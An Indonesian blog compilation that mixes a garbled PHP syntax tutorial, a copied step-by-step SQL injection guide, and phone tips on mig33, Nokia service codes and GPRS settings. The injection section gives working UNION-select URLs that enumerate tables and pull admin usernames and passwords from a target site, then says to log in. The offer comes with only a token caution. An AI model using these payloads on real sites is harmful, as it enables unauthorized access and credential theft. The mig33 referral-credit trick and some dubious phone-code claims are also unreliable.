about php

"the pippop"
PHP adalah bahasa pemorgraman yang memungkinkan para web developer untuk membuat aplikasi web yang dinamis dengan cepat. PHP merupakan singkatan dari “PHP: Hypertext Preprocessor”. PHP ditulis dan diperkenalkan pertama kali sekitar tahun 1994 oleh Rasmus Lerdorf melalui situsnya untuk mengetahui siapa saja yang telah mengakses ringkasan online-nya.

PHP merupakan salah satu bahasa script yang terbilang baru dan tersedia secara bebas dan masih memungkinkan untuk dikembangkan lebih lanjut. PHP dapat diintegrasikan (embedded) ke dalam web server, atau dapat berperan sebagaiprogram CGI yang terpisah.

Karakteristik yang paling unggul dan paling kuat dalam PHP adalah lapisan integrasi database (database integration layer). Database yang didukung PHP adalah: Oracle, Adabas-D, Sybase, FilePro, mSQL, Velocis, MySQL, Informix, Solid, dBase, ODBC, Unix dbm, dan PostgreSQL. Contoh script PHP sederhana
terdapat pada Listing 1.

Listing 1 : Contoh Script PHP
Code:

echo “Halo dari PHP!”;
?>

2 Informasi Sintaks Umum
2.1 Keluar dari HTML
Listing 2 : Cara untuk Memisahkan Blok Kode PHP di dalam HTML
Code:
“; ?>
“; ?>

echo “Beberapa editor HTML tidak menyukai pemrosesan
instruksi
“;

2.2 Komentar Program
Ada tiga macam style penulisan komentar program yang dapat digunakan, yaitu :
– C style, komentar diawali dengan tag /* dan diakhiri dengan */, style ini
digunakan untuk komentar yang lebih dari satu baris.
– C++ style, komentar diawali dengan tag // dan hanya berlaku untuk satu baris
komentar, untuk baris berikutnya harus diawali tag // lagi.
– Bourne Shell style, diawali dengan tag # untuk satu baris komentar.
Listing 3 : Komentar Program
echo “Halo semua!
“; // Ini komentar C style;
/*
Ini komentar
yang lebih dari satu baris
*/
echo “Halo lagi!
“; # Ini komentar shell-style
?>
3 Tipe Data
PHP mendukung tipe-tipe berikut : angka floating-point, integer, string, array,
dan object. Tipe variabel ditentukan oleh konteks variabel tersebut dan tidak
ditentukan secara eksplisit oleh programmer.
3.1 Angka : Integer dan Floating Point
Integer dapat dituliskan dengan notasi desimal, oktal, atau heksadesimal. Angka
floating-point dapat dituliskan dalam notasi standar atau scientific.
Listing 4 : Representasi Angka
Code:
$int1 = 523; // desimal
$int2 = -523; // desimal negatif
$int3 = 01013; // representasi oktal dari 523
$int4 = 0x20B; // representasi heksa dari 523
$float1 = 523.197; // notasi float standar
$float2 = 5.23197e2; // notasi float scientific
// Cetak semua angka
echo “$int1
$int2
$int3
$int4
$float1
$float2”;
?>
3.2 String
String dalam PHP dibatasi oleh kutip ganda (“) atau kutip tunggal (‘).
Perbedaannya adalah bagaimana string tersebut diinterpretasikan. Jika string
dibatasi oleh kutip ganda, variabel di dalam string akan ditampilkan.
Listing 5 : Contoh String
Code:
$makanan = “eskrim”;
echo “Saya suka $makanan
”;
echo ‘Saya suka $makanan’;
?>
Karakter backslash (\) di dalam string dengan kutip ganda dapat digunakan untuk
menuliskan karakter khusus (escape sequences) yang terdapat pada Tabel 1.
Tabel 1. Escape Sequences di dalam String dengan Petik Ganda
Sequence
Arti
\n
Baris baru
\r
Carriage return
\t
Tab horizontal
\\
Backslash
\”
Tanda kutip ganda
\$
Tanda dollar
3.3 Array
Array dalam PHP dapat berupa indexed array (vektor) dan hash tables
(associative arrays). PHP juga mendukung array multidimensi.
Listing 6 : Inisialisasi dan Penggunaan Array
Code:
// Membuat array sederhana secara eksplisit
$a[0] = “Buku”;
$a[1] = “Pinsil”;
$a[] = “Bolpen”; // secara implisit ditempatkan pada indeks
// (key) 3
$a[] = “Penghapus”; // secara implisit ditempatkan pada indeks
// (key) 4
echo “$a[0], $a[1], $a[2], $a[3]
“;
// Membuat array asosiatif
$tanaman[“pangan”] = “padi”;
$tanaman[“hias”] = “anggrek”;
$tanaman[“sayuran”] = “wortel”;
echo “Contoh tanaman hias adalah {$tanaman[“hias”]}
“;

// Membuat array asosiatif spt di atas, namun caranya lebih
// sederhana
$tanaman = array(“pangan” => “padi”, “hias” => “anggrek”,
“sayuran” => “wortel”);
echo “Contoh tanaman sayuran adalah {$tanaman[“sayuran”]}
“;
// Membuat array multidimensi
$b[0][0] = “Nol Nol”;
$b[0][1] = “Nol Satu”;
echo “Nilai \$b[0][1] adalah {$b[0][1]}
“;
// Membuat array asosiatif multidimensi
$kota[“Jabar”][0] = “Bogor”;
$kota[“Jabar”][1] = “Bandung”;
$kota[“Jateng”][0] = “Semarang”;
$kota[“Jateng”][1] = “Solo”;
echo “\$kota[‘Jabar’][1] = {$kota[‘Jabar’][1]}
“;
?>
3.4 Object
Object adalah sebuah tipe data yang dapat berupa sebuah bilangan, variabel, atau
bahkan sebuah fungsi.
Listing 7 : Penggunaan Tipe Data Object
Code:
class tanaman
{
function tanaman()
{
$this->komoditas = “apel”;
}
function set_var($komoditas)
{
$this-> komoditas = $komoditas;
}
}
$buah = new tanaman();
echo $buah -> komoditas;
$buah -> set_var(“mangga”);
echo ”
“.$buah -> komoditas;
?>
4 Variabel dan Konstanta
Variabel PHP diawali dengan tanda dolar ($) kemudian diikuti dengan nama
variabel. Semua nama variabel bersifat case-sensitive. Nama variabel yang valid
harus diawali oleh huruf atau garis bawah yang diikuti oleh sejumlah huruf,
angka, atau garis bawah.
Listing 8 : Contoh Nama Variabel
Code:
$variabel1 = “Printer”;
$variabel2 = “Epson”;
echo “$variabel1, $variabel2”;
$1variabel = 123;
// nama variabel yang salah
$_tes = “tes”; // benar, diawali oleh garis bawah
$test_Ç = “tes2”;
// benar, Ç adalah ASCII 128
?>
Variabel dapat diisi nilai maupun referensi. Ketika variabel diisi nilai, seluruh
nilai dari ekspresi asli diisikan ke variabel tujuan. Setelah diisi, variabel asli
bersifat independen, sehingga perubahan pada satu variabel tidak mempengaruhi
yang lain.
Ketika variabel diisi referensi, variabel baru merefer pada variabel asli.
Perubahan yang dibuat pada salah satu variabel akan berpengaruh pada variabel
satunya. Untuk mengisi dengan referensi, tambahkan tanda & pada nama
variabel.
Listing 9 : Pengisian Variabel
Code:
$variabel1 = “Printer”;
$variabel2 = $variabel1; // diisi nilai
echo “$variabel1, $variabel2
”;
$variabel2 = “Epson”;
echo “$variabel1, $variabel2
”;
$variabel3 = &$variabel1; // diisi referensi
echo “$variabel1, $variabel3
”;
$variabel3 = “HP”;
echo “$variabel1, $variabel3
”;
?>
4.1 Predefined Variable
PHP memiliki variabel-variabel yang telah didefinisikan sebelumnya (predefined
variable). Nilai variabel-variabel tersebut bergantung pada sejumlah faktor,
diantaranya jenis server, setting server, dan lain-lain. Predefined variable
selengkapnya dapat dilihat dengan fungsi phpinfo()

4.2 Operator
4.2.1 Operator Aritmatika
Operator
Nama
Contoh
Hasil
+
Penjumlahan
$a + $b
Jumlah $a dan $b

Pengurangan
$a – $b
Selisih $a dan $b
*
Perkalian
$a * $b
Hasil kali $a dan $b
/
Pembagian
$a / $b
Hasil bagi $a dan $b
%
Modulus
$a % $b
Sisa dari $a dibagi $b
4.2.2 Operator Bitwise
Operator Nama
Contoh
Hasil
&
And
$a & $b
11 (1011 biner) &13 (1101 biner) 9 (1001 biner)
|
Or
$a | $b
11 (1011 biner) | 13 (1011 biner) 15 (1111 biner)
^
Xor
$a ^ $b
11 (1011 biner) ^13 (1101 biner) 6 (0110 biner)

Not
-$a
-11
12 (desimal)
<<
Shift Left
$a << $b
11 (1011 biner) <>
Shift Right $a >> $b
11 (1011 biner) >> 2
44 (101100 biner)
4.2.3 Operator Increment/Decrement
Operator/Contoh Nama
Hasil
$a++
Post-increment
Operasi dilaksanakan, kemudian $a
ditambah satu.
++$a
Pre-increment
$a ditambah satu, kemudian operasi
dilaksanakan.
$a–
Post-decrement
Operasi dilaksanakan, kemudian $a
dikurangi satu.
–$a
Pre-decrement
$a dikurangi satu, kemudian operasi
dilaksanakan.

Hacking Website dengan tekhnik SQL Injection

hacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.

apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’
dengan cara manipulasi data input ke applikasi tsb.

ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N

oke, mari kita simak bersama-sama.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100&#8242;

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–“. Terserah aja…

Kalo “+” sebagai penghubung perintah…

6. Nah sampe sini langsung dah nyobain satu2…

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error…
Misalkan errornya disini…

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah “9”
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)

8. Misalnya angka hoki yang keluar adalah “3” maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…

Misalnya yang lo liat adalah table “admin”

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…

Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————

begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

oke selamat mencoba.
terpenting jangan dilakukan di web teman anda ataupun di website Lokal.

referensi :
. http://jasakom.com
. http://ezine.echo.or.id
. http://cruzenaldo.co.cc
. http://students.ee.itb.ac.id

TIPS MURAH OL PC IM3

Bagi pengguna kartu GSM im3 bila menghendaki koneksi lebih murah gampang saja kok, tinggal mengatur tampilan pada BROWSER. (Internet Explorer/Opera/Mozila dll.) Aturlah tampilan pada BROWSER se-minimalis mungkin, bila perlu image/foto tidak perlu ditampilkan. Hal ini akan sangat berpengaruh pada penggunaan pulsa karena semakin sedikit Kilobyte (Kb) yang kita tampilkan pada dekstop maka, sedikit pula pulsa/fuluzz yang kita keluarkan untuk berInternet-ria.

Oia, Kalau hanya buat baca gunakan user indosat terus seting IE-nya (tools->internet options->Advanced->Multimedia->Ilangin tanda cek pada multimedia semuanya->oke) maka nikmatilah berinternet murah menggunakan IM3 dan Kalo mau download pake indosat@durasi aja.

Selamat mencoba, nikmatilah koneksi internet murah-meriah ala anak kosan. Semoga sedikit informasi ini dapat bermanfaat untuk sesama. Saya menyadari tulisan ini banyak kekurangannya, untuk itu saya mohon maaf apabila segala sesuatunya kurang berkenan.

Bagi pengguna kartu GSM Mentari maupun im3, Anda juga bisa mendapatkan fasilitas internet murah, yaitu buka Internet Connection lalu klik kanan Icons mentari/im3, pilih propertis pada Motorola Phone Tools. Ubah menu Identifications seperti yang saya tulis di bawah ini.

Setingan Mentari/im3 Internet Durasi

APN : indosatgprs
User Name : indosat@durasi
Password : indosat@durasi
IP : 010.019.019.019

tips & triks nambah IDR MIG33

Tags

tanpa ba bi bu langsung aja okeh..

1. Persiapkan satu nomor gsm yg blm pernah dipakai untuk register nick mig33.
2. Loginlah ke mig33 menggunakan nick yg anda kehendaki untuk ditambah accountnya.
3. Setelah berhasil login, kemudian pencet OPTION, lalu cari menu INVITE FRIEND.
4. Pada kotak PHONE NUMBER, masukkan nmr gsm yg dimaksud pd point 1, lalu pd kotak YOUR NAME, masukkan nick anda, lalu pencet INVITE FRIEND.
5. Registerkan nmr gsm yg anda invite, jadi sebuah nick yg baru.
6. Setelah nick baru tsbt sukses terdaftar, silahkan cek account pd nick anda yg lama, account anda akan bertambah dgn sendirinya😮 :p😀
7.semua kartu bisa dinvite kecuali kartu m3 dengan belakang nomer 0857xxxxxxx

kalo pengen lebih instanst pake kartu credit 😛

..::selamat mencoba::..

New emote comand MIG33

Tags

list emote comand :

/agree 002. /cmon 003.
/gasp 004. /lag 005. /ruffle 006. /squirt 007. /apologizes 008.
/comfort 009. /gee 010. /laugh 011. /salute 012. /stare 013.
/argh 014. /confuse 015. /giggle 016. /listen 017. /scream 018.
/strut 019. /bark 020. /congrat 021. /glare 022. /loser 023.
/seduce 024. /tag 025. /bearhug 026. /cringe 027. /gn 028. /love 029.
/shiver 030. /tantrum 031. /beer 032. /cry 033. /greet 034.
/martian 035. /shmoo 036. /thnak 037. /beg 038. /doh 039.
/grin 040. /miss 041. /shrug 042. /tpyo 043. /blink 044. /drool 045.
/groan 046. /mmm 047. /shy 048. /warcry 049. /blowk 050. /drunk 051.
/happy 052. /moo 053. /sick 054. /wave 055. /blush 056. /duck 057.
/hfive 058. /mumble 059. /sigh 060. /whistle 061. /boo 062.
/eek 063. /hi

New emote comand :

-/me

-/roll

-/8ball

-/fortune

———-uh ah uh oh———–

go
medal
nini
luck
jingjing
champion
welcome
gold
win
lose
torch
cheers
winner
challenge
record
beibie
proud
huanhuan

by: pippodejavu@mig33.com

Edit tampilan mig 33

Tags

Mw ksi tips nih cara Edit tampilan mig bwatan kalian sndiri:

1.Download app mig lwat pc.Tp inget jgn slah download.Tar film ***** d download lg .
2.Extrak file .Jar pake win rar
3.Cri 3 file gambar format .PNG
4.Nah gambar yg format PNG it yg anda rubah tampilan ny pake gambar anda sendiri edit ny Pake pain ato photoshop.
5.Ukuran gambar,dan format hrs sama gx bleh beda dgn file asli boleh tapi jangan banyak2 :p kalo kegedean hasil nya pecah bruw
6.Masukan 3 file gambar format PNG anda sndiri.Ke folder jar yg td d extrak.Dan file gambar PNG yang lama anda hapus dan ganti kan dgn gambar anda.
7.Enscrip lg folder yg tadi pake winrar.Lalu rename ubah format jadi .jar
8.kirim ke hp anda singkronasi pc lwat media USB ato dll.Instal d hp anda.Apa yg terjadi mig tampilan ny jadi gambar anda sndiri..Good luck !!.Maf bru d share skrng tips ny.

code nokia

Warning: Tray these codes at your own risk! We don’t accept any complains & Some of these codes may not work

On the main csreen type *#06# for checking the IMEI (international Mobile Equipment identity).

*#7780# rest to factory settings.

*#67705646# This will clear the LCD display (operator logo).

*#0000# To view software version.

*#32820# Bluetooth device address

*#764025625# Sim clock allowed status.

*#62209526# Display the MAC addressbof the WLAN adapter.
This is avilable only in the newer device that supports WLAN like N80

#pw+1234567890+1# Shows if sim have restrictions.

*#92702689# Takes you to a secret menu of the information below.
1. Display Serial Number.
2. Display the Month and Year of Manufacture.
3. DISPLAY (if there) the date where the phone was purchased (MMYY).
4. Display the date of the last repair – if found (0000).
5. Show life timer of phone (time passes since last start).

*#3370# – Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if you want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.

*#3370# – (EFR) deactivation. Phone will automatically restart. Increse battery life by 30% because phone recives less signal from network.

*#4720# – Half Rate Codec deactivation. The phone will automatically restart

If you forgot wallet code for Nokia S60 phone, use this code.
Reset: *#7370925538#
Note: your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345.
Press *#3925538# to delete the contents and of wallet.
*#7328748263373738# resets security code.
Default security code is: 12345.

Unlock service provider: insert simm, turn phone on and press vol up (arrow keys) for 3 seconds, should say pin code. press C, then press * message should flash press * again and 04*pin*pin*pin#.

Change closed caller group (settings >security setting> usergroups) to 00000 and youre phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms at shp exits, gr8 for paractical jokes! (works with some of the Nokia phones).

copyright@internet.2008

cara aktifin gprs di hp

karena saya ga suka basa basi, langsung aja :

TELKOMSEL

Langkah 1 :

mengaktifkan layanan GPRS di kartu :
Ketik SMS : GPRSon no_chip_kartu
Contoh : GPRS on 62218686690
Kirim ke : 6616

langkah 2 mengaktifkan GPRS ponsel anda :

Setting GPRS Automatis :
Ketik SMS : S‹spasi›MerkHP‹spasi›TypeHP
Contoh : S NOKIA 7650
Kirim Ke : 5432

Atau :

Setting GPRS Manual :
Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com
Data Bearer : GPRS
Proxy port number : 9201 atau 8000

INDOSAT MATRIX & MENTARI

Contoh Setting GPRS di Sony Ericsson T610

Setting Data Account GPRS
1. Tekan tombol navigasi untuk masuk ke menu utama
2. Pilih icon “Connectivity”
3. Pilih menu “Data comm.”
4. Pilih menu “Data accounts”
5. Pilih menu “New account”
6. Pada menu Account type pilih menu “GPRS data”
7. Pada Name: isi “Satgprs”
8. Pada menu New GPRS data isi parameter berikut :
• APN : satelindogprs.com
• User id : (kosongkan)
• Password : (kosongkan)
9. Tekan tombol save

Setting WAP
1. Tekan tombol navigasi untuk masuk ke menu utama
2. Pilih icon “Connectivity”
3. Pilih menu “WAP options”
4. Pilih menu “WAP profiles”
5. Pilih menu “New profile”
6. Pada menu New profile isi parameter berikut :
• Name : Satgprs
• Connect using : pilih Satgprs
• IP address : 202.152.162.250
7. Tekan tombol save
8. Masih dimenu “WAP Profiles”
9. Pilih “Satgprs”, tekan “Select”, lalu tekan “Edit” v 10. Pilih menu “Advanced”
11. Pilih menu “Change homepage”
12. Pada menu Change homepage isi parameter berikut :
• Name : Satgprs
• WWW Address : hapus [Internal address] ganti dengan “http://satwap&#8221;
13. Tekan tombol panah sampai kembali ke standby.
14. Tekan tombol navigasi untuk masuk ke menu utama
15. Pilih icon “Internet services”
16. Pilih tombol “More”
17. Pilih “Satgprs” untuk mulai WAP browsing.

Cara penggunaan GPRS
1. Internet option
2. More
3. Pilih Menu Bookmarks
4. Pilih menu Add Bookmarks
• Title: Yahoo atau MIS
• Address: http://www.gsi-biz.com/mobile_gsi.jar

Setting GPRS Mentari, Matrix, IM3, XL, Telkomsel
MENTARI :

Setting GPRS OTA :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 3000
Contoh: GPRS NOKIA 7650

Setting GPRS Manual :
Profile Name INDOSATGPRS
User name : indosat
APN : http://www.satelindogprs.com
Password : indosat
Gateway IP : 10.19.19.19
Homepage : http://wap.klub-mentari.com
Data Bearer : GPRS
Proxy port number :

MATRIX :

Setting GPRS OTA :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 3939
Contoh: GPRS NOKIA 7650

Setting GPRS Manual :
Profile Name satelindo Homepage
User name :
APN : http://www.satelindogprs.com
Password :
Gateway IP : 202.152.162.250
Homepage : http://wap.matrix-centro.com
Data Bearer : GPRS
Proxy port number : 9201

IM3 :

Setting GPRS OTA :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 3939
Contoh: GPRS NOKIA 7650

Setting GPRS Manual :
Profile Name
User name : gprs
APN : http://www.indosat-m3.net
Password : im3
Gateway IP : 010.019.019.019
Homepage : http://wap.m3-access.com
Data Bearer : GPRS
Proxy port number : 9201 atau 8080

XL :

Setting GPRS OTA :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 9667
Contoh: GPRS NOKIA 7650

Setting GPRS Manual :
Profile Name : XL GPRS
User name : xlgprs
APN : http://www.xlgprs.net
Password : proxl
IP Address : 202.152.240.50
Homepage : http://wap.lifeinhand.com
Data Bearer : GPRS
Proxy port number : 8080

TELKOMSEL :

Setting GPRS OTA :
Ketik SMS: S‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 5432
Contoh: S NOKIA 7650

Setting GPRS Manual :
Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
Prompt Password : No
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com
Connection Security : Off
Session Mode : Permanent

dejavu.jpg

by : pippo@allnetwork.or.id #tuban

Cara Berinternet Dengan Komputer Menggunakan Handphone Sebagai Modem

no titlesuck

Sekarang dimanapun Anda berada asalkan sinyal handphone Anda bagus, maka Anda pun berkesempatan untuk melakukan koneksi internet. Jika sinyal handphone bagus biasanya sinyal GPRS juga bagus, nah sinyal GPRS inilah yang dapat memungkinkan kita berinternet dimanapun kita berada. Untuk contoh kali ini saya menggunakan kartu Mentari yang memasang tarif GPRS Rp.5/kb (termurah saat ini). Sinyal GPRS akan aktif di handphone dengan terlebih dahulu melakukan setting. Untuk kartu Mentari cukup SMS: GPRS <spasi> merk handphone <spasi> tipe handphone dan kirim ke 3000. Sedangkan operator lain silahkan lihat di buku panduan masing-masing.

Beberapa hal yang perlu dipersiapkan adalah:

1. Handphone dengan fasilitas Bluetooth

Aktifkan bluetooth di handphone yang ditandai dengan menyalanya lampu dan gambar bluetooth akan aktif.

2. Bluetooth versi 2.0

Pasanglah bluetooth di komputer Anda, lalu installah drivernya. (harga bluetooth sekitar Rp.50.000)

3. Komputer/laptop

Cara melakukan koneksinya sebagai berikut:

1. Buka My Computer.

2. Klik ganda My Bluetooth Place

3. Klik ganda Add a Bluetooth Device

4. Hingga muncul kotak dialog Bluetooth Setup, lalu tekan Next. Biarkan proses pencarian bluetooth (pada handphone) dilakukan secara otomatis oleh komputer.

5. Jika belum muncul tekan Search Again sampai muncul. Ada beberapa kemungkinan jika tidak muncul, bluetooth pada komputer tidak terpasang dengan baik (lepas dan pasang lagi), kedua bluetooth pada handphone tidak aktif (matikan lalu aktifkan lagi).

6. Jika pencarian berhasil maka akan muncul nama bluetooth handphone seperti gambar berikut, lalu seleksi ikon handphone dilanjutkan dengan menekan Next.

1.jpg

   

7. Beri ceklis Dial-Up Networking, sehingga akan muncul kotak dialog baru lalu klik OK. Terakhir tekan Finish.

8. Sehingga pada jendela Bluetooth akan muncul nama ikon dari bluetooth handphone kita misalnya: catur Dial-Up Networking, klik ganda ikon tersebut.

9. Lalu akan muncul Bluetooth Passkey Requered, klik kotak berwarna kuning pada system tray tersebut (pojok bawah kanan layar), sehingga akan muncul kotak dialog baru.

10. Masukkan nomer tertentu (misalnya: 333) lalu tekan OK.

11. Secara otomatis pada handphone Anda juga akan meminta nomer yang sama. Maka masukkan nomer tadi yaitu 333 (harus sama). Ingat proses ini harus dilakukan secara cepat, jangan terlalu lama.

12. Lalu akan muncul kotak dialog seperti berikut. Masukkan nama dan password (bebas), pada kolom Dial masukkan *99***1# lalu tekan Dial.

pippocom.jpg

 

13. Tunggu beberapa saat, jika berhasil maka akan muncul gambar seperti berikut pada system tray.

3.jpg

 

14. Dan sekarang komputer Anda siap digunakan untuk berinternet.